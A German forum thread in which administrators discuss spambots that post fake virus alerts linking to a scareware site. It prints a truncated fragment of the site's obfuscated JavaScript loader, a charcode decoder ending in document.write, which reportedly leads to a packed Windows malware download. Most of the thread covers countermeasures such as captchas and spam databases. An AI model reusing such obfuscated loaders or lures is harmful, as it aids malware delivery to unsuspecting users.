Spambots

[Jtb]

Wir kämpfen leider gerade gegen ein paar Spambots im Forum.

Zum Beispiel der mittlerweile gebannte Benutzer ForenTeam, die folgende Mitteilungen verschickt hat:

A virus alert was noticed on your computer.
We highly recommend you to check your computer and perform online virus check at our site immediately: http://security-tool2010.BLA/MrH

[Jtb]

Ach ja, ich glaube man muss nicht weiter sagen, dass der Link einen Exploit enthält:

Code:

[....]
@(**40@(**41@(**59@(**125@(**32@(**41@(**40@(**41@(**59@(**13@(**10@(**60@(**47@(**115@(**99@(**114@(**105@(**112@(**116@(**62@(**";
        temp = xa670.split("@(**");
        for (var i in temp) {
                out += String.fromCharCode(temp[i]);
        }
        document.write(out);
})();

</script>

Im Endeffekt kommt aber nur ein Download einer Exe mit einem Packed.Win32.Krap.ai...

[Kai S.]

Interessant; ich supporte ein BG, in dessen Forum war exakt der selbe spambot am werkeln ^^

[Jtb]

Ich hab jetzt erstmal bei den Benutzeraccounts aufgeräumt - ein paar Dutzend Spamaccounts gelöscht.

Ob und wie wir die Registrierung für Bots erschweren, sehen wir demnächst

[Arne]

- Öfter wechselnden Captcha Text. Bei 20maligem neu anfordern des Bildes hab ich immer den selben Text, bloß geändertes Design. Der Text sollte auch wechseln bei Neuanforderung oder Reload der Seite. Text mit unterschiedlicher Farbe und Schriftart innerhalb eines Bildes, da es schon schon sehr gute Captcha-Cracker-Bots gibt.
- Double opt-in eMail verification (evt. schon vorhanden?)

[thyrox]

kann man vielleicht recaptcha einbinden?

http://recaptcha.net/

so long,

thyrox

[k0re]

kann man vielleicht recaptcha einbinden?

http://recaptcha.net/

so long,

thyrox

http://custom.simplemachines.org/mods/index.php?mod=1044

gibt es...

[voellger]

jaja, ich brauch nur n bissl zeit, dann wirds gemacht

[Jtb]

Als erste Gegenmaßnahme gibt es jetzt eine Überprüfung von neuen Logins gegen die Datenbank von www.stopforumspam.com